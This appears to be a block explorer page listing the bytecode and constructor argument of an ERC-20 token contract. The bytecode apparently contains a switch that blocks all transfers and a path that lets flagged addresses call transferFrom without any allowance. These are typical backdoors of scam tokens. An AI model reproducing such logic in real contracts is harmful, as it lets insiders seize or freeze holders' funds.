a6f90611407565b60405180910390fd5b610a83838383610c08565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610b06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610afd90611495565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610bef9190610e08565b60405180910390a3610c02848484610c5d565b50505050565b610c13838383610c62565b600160065403610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906114fd565b60405180910390fd5b505050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610ca982610c67565b610cb38185610c71565b9350610cc3818560208601610c81565b610ccc81610c8f565b840191505092915050565b5f6020820190508181035f830152610cef8184610c9f565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610d2482610cfb565b9050919050565b610d3481610d1a565b8114610d3e575f80fd5b50565b5f81359050610d4f81610d2b565b92915050565b5f819050919050565b610d6781610d55565b8114610d71575f80fd5b50565b5f81359050610d8281610d5e565b92915050565b5f8060408385031215610d9e57610d9d610cf7565b5b5f610dab85828601610d41565b9250506020610dbc85828601610d74565b9150509250929050565b5f8115159050919050565b610dda81610dc6565b82525050565b5f602082019050610df35f830184610dd1565b92915050565b610e0281610d55565b82525050565b5f602082019050610e1b5f830184610df9565b92915050565b5f805f60608486031215610e3857610e37610cf7565b5b5f610e4586828701610d41565b9350506020610e5686828701610d41565b9250506040610e6786828701610d74565b9150509250925092565b5f60ff82169050919050565b610e8681610e71565b82525050565b5f602082019050610e9f5f830184610e7d565b92915050565b5f60208284031215610eba57610eb9610cf7565b5b5f610ec784828501610d41565b91505092915050565b5f8060408385031215610ee657610ee5610cf7565b5b5f610ef385828601610d41565b9250506020610f0485828601610d41565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610f5257607f821691505b602082108103610f6557610f64610f0e565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610fa282610d55565b9150610fad83610d55565b9250828201905080821115610fc557610fc4610f6b565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611025602583610c71565b915061103082610fcb565b604082019050919050565b5f6020820190508181035f83015261105281611019565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6110b3602483610c71565b91506110be82611059565b604082019050919050565b5f6020820190508181035f8301526110e0816110a7565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611141602283610c71565b915061114c826110e7565b604082019050919050565b5f6020820190508181035f83015261116e81611135565b9050919050565b5f61117f82610d55565b915061118a83610d55565b925082820261119881610d55565b915082820484148315176111af576111ae610f6b565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6111ed82610d55565b91506111f883610d55565b925082611208576112076111b6565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f61126d602183610c71565b915061127882611213565b604082019050919050565b5f6020820190508181035f83015261129a81611261565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6112d5601d83610c71565b91506112e0826112a1565b602082019050919050565b5f6020820190508181035f830152611302816112c9565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611363602583610c71565b915061136e82611309565b604082019050919050565b5f6020820190508181035f83015261139081611357565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6113f1602383610c71565b91506113fc82611397565b604082019050919050565b5f6020820190508181035f83015261141e816113e5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61147f602683610c71565b915061148a82611425565b604082019050919050565b5f6020820190508181035f8301526114ac81611473565b9050919050565b7f546f6b656e3a205472616e7366657220697320726573747269637465640000005f82015250565b5f6114e7601d83610c71565b91506114f2826114b3565b602082019050919050565b5f6020820190508181035f830152611514816114db565b905091905056fea2646970667358221220022f0fd034b5063772c3cf3e7854e6bdb173e2f46a58e61637737387e33f947464736f6c634300081a00330000000000000000000000006351e40bb3e89dc069d7e37217410f58ae3dd6df

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100f3575f3560e01c80633950935111610095578063a457c2d711610064578063a457c2d714610289578063a9059cbb146102b9578063c5c03af3146102e9578063dd62ed3e14610307576100f3565b806339509351146101ed5780633af3d7831461021d57806370a082311461023b57806395d89b411461026b576100f3565b80631c8fc2c0116100d15780631c8fc2c01461016357806323b872dd14610181578063313ce567146101b157806332be6330146101cf576100f3565b806306fdde03146100f7578063095ea7b31461011557806318160ddd14610145575b5f80fd5b6100ff610337565b60405161010c9190610cd7565b60405180910390f35b61012f600480360381019061012a9190610d88565b6103c7565b60405161013c9190610de0565b60405180910390f35b61014d6103e9565b60405161015a9190610e08565b60405180910390f35b61016b6103f2565b6040516101789190610e08565b60405180910390f35b61019b60048036038101906101969190610e21565b6103f7565b6040516101a89190610de0565b60405180910390f35b6101b9610495565b6040516101c69190610e8c565b60405180910390f35b6101d761049d565b6040516101e49190610e08565b60405180910390f35b61020760048036038101906102029190610d88565b6104a2565b6040516102149190610de0565b60405180910390f35b6102256104d8565b6040516102329190610e08565b60405180910390f35b61025560048036038101906102509190610ea5565b6104dc565b6040516102629190610e08565b60405180910390f35b610273610521565b6040516102809190610cd7565b60405180910390f35b6102a3600480360381019061029e9190610d88565b6105b1565b6040516102b09190610de0565b60405180910390f35b6102d360048036038101906102ce9190610d88565b610626565b6040516102e09190610de0565b60405180910390f35b6102f1610648565b6040516102fe9190610e08565b60405180910390f35b610321600480360381019061031c9190610ed0565b61064e565b60405161032e9190610e08565b60405180910390f35b60606004805461034690610f3b565b80601f016020809104026020016040519081016040528092919081815260200182805461037290610f3b565b80156103bd5780601f10610394576101008083540402835291602001916103bd565b820191905f5260205f20905b8154815290600101906020018083116103a057829003601f168201915b5050505050905090565b5f806103d16106d0565b90506103de8185856106d7565b600191505092915050565b5f600354905090565b600181565b5f806104016106d0565b90505f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661045957600161045b565b5f5b60ff16905061047d8683610478848861089a90919063ffffffff16565b610911565b61048886868661099c565b6001925050509392505050565b5f6012905090565b600281565b5f806104ac6106d0565b90506104cd8185856104be858961064e565b6104c89190610f98565b6106d7565b600191505092915050565b5f81565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606005805461053090610f3b565b80601f016020809104026020016040519081016040528092919081815260200182805461055c90610f3b565b80156105a75780601f1061057e576101008083540402835291602001916105a7565b820191905f5260205f20905b81548152906001019060200180831161058a57829003601f168201915b5050505050905090565b5f806105bb6106d0565b90505f6105c8828661064e565b90508381101561060d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106049061103b565b60405180910390fd5b61061a82868684036106d7565b60019250505092915050565b5f806106306106d0565b905061063d81858561099c565b600191505092915050565b60065481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610745576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161073c906110c9565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107aa90611157565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161088d9190610e08565b60405180910390a3505050565b5f8083036108aa575f905061090b565b5f82846108b79190611175565b90508284826108c691906111e3565b14610906576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108fd90611283565b60405180910390fd5b809150505b92915050565b5f61091c848461064e565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146109965781811015610988576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161097f906112eb565b60405180910390fd5b61099584848484036106d7565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0190611379565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6f90611407565b60405180910390fd5b610a83838383610c08565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610b06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610afd90611495565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610bef9190610e08565b60405180910390a3610c02848484610c5d565b50505050565b610c13838383610c62565b600160065403610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906114fd565b60405180910390fd5b505050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610ca982610c67565b610cb38185610c71565b9350610cc3818560208601610c81565b610ccc81610c8f565b840191505092915050565b5f6020820190508181035f830152610cef8184610c9f565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610d2482610cfb565b9050919050565b610d3481610d1a565b8114610d3e575f80fd5b50565b5f81359050610d4f81610d2b565b92915050565b5f819050919050565b610d6781610d55565b8114610d71575f80fd5b50565b5f81359050610d8281610d5e565b92915050565b5f8060408385031215610d9e57610d9d610cf7565b5b5f610dab85828601610d41565b9250506020610dbc85828601610d74565b9150509250929050565b5f8115159050919050565b610dda81610dc6565b82525050565b5f602082019050610df35f830184610dd1565b92915050565b610e0281610d55565b82525050565b5f602082019050610e1b5f830184610df9565b92915050565b5f805f60608486031215610e3857610e37610cf7565b5b5f610e4586828701610d41565b9350506020610e5686828701610d41565b9250506040610e6786828701610d74565b9150509250925092565b5f60ff82169050919050565b610e8681610e71565b82525050565b5f602082019050610e9f5f830184610e7d565b92915050565b5f60208284031215610eba57610eb9610cf7565b5b5f610ec784828501610d41565b91505092915050565b5f8060408385031215610ee657610ee5610cf7565b5b5f610ef385828601610d41565b9250506020610f0485828601610d41565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610f5257607f821691505b602082108103610f6557610f64610f0e565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f610fa282610d55565b9150610fad83610d55565b9250828201905080821115610fc557610fc4610f6b565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611025602583610c71565b915061103082610fcb565b604082019050919050565b5f6020820190508181035f83015261105281611019565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6110b3602483610c71565b91506110be82611059565b604082019050919050565b5f6020820190508181035f8301526110e0816110a7565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611141602283610c71565b915061114c826110e7565b604082019050919050565b5f6020820190508181035f83015261116e81611135565b9050919050565b5f61117f82610d55565b915061118a83610d55565b925082820261119881610d55565b915082820484148315176111af576111ae610f6b565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6111ed82610d55565b91506111f883610d55565b925082611208576112076111b6565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f61126d602183610c71565b915061127882611213565b604082019050919050565b5f6020820190508181035f83015261129a81611261565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6112d5601d83610c71565b91506112e0826112a1565b602082019050919050565b5f6020820190508181035f830152611302816112c9565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611363602583610c71565b915061136e82611309565b604082019050919050565b5f6020820190508181035f83015261139081611357565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6113f1602383610c71565b91506113fc82611397565b604082019050919050565b5f6020820190508181035f83015261141e816113e5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61147f602683610c71565b915061148a82611425565b604082019050919050565b5f6020820190508181035f8301526114ac81611473565b9050919050565b7f546f6b656e3a205472616e7366657220697320726573747269637465640000005f82015250565b5f6114e7601d83610c71565b91506114f2826114b3565b602082019050919050565b5f6020820190508181035f830152611514816114db565b905091905056fea2646970667358221220022f0fd034b5063772c3cf3e7854e6bdb173e2f46a58e61637737387e33f947464736f6c634300081a0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000006351e40bb3e89dc069d7e37217410f58ae3dd6df

-----Decoded View---------------
Arg [0] : pair (address): 0x6351e40BB3e89dC069d7E37217410F58Ae3DD6DF

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000006351e40bb3e89dc069d7e37217410f58ae3dd6df


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.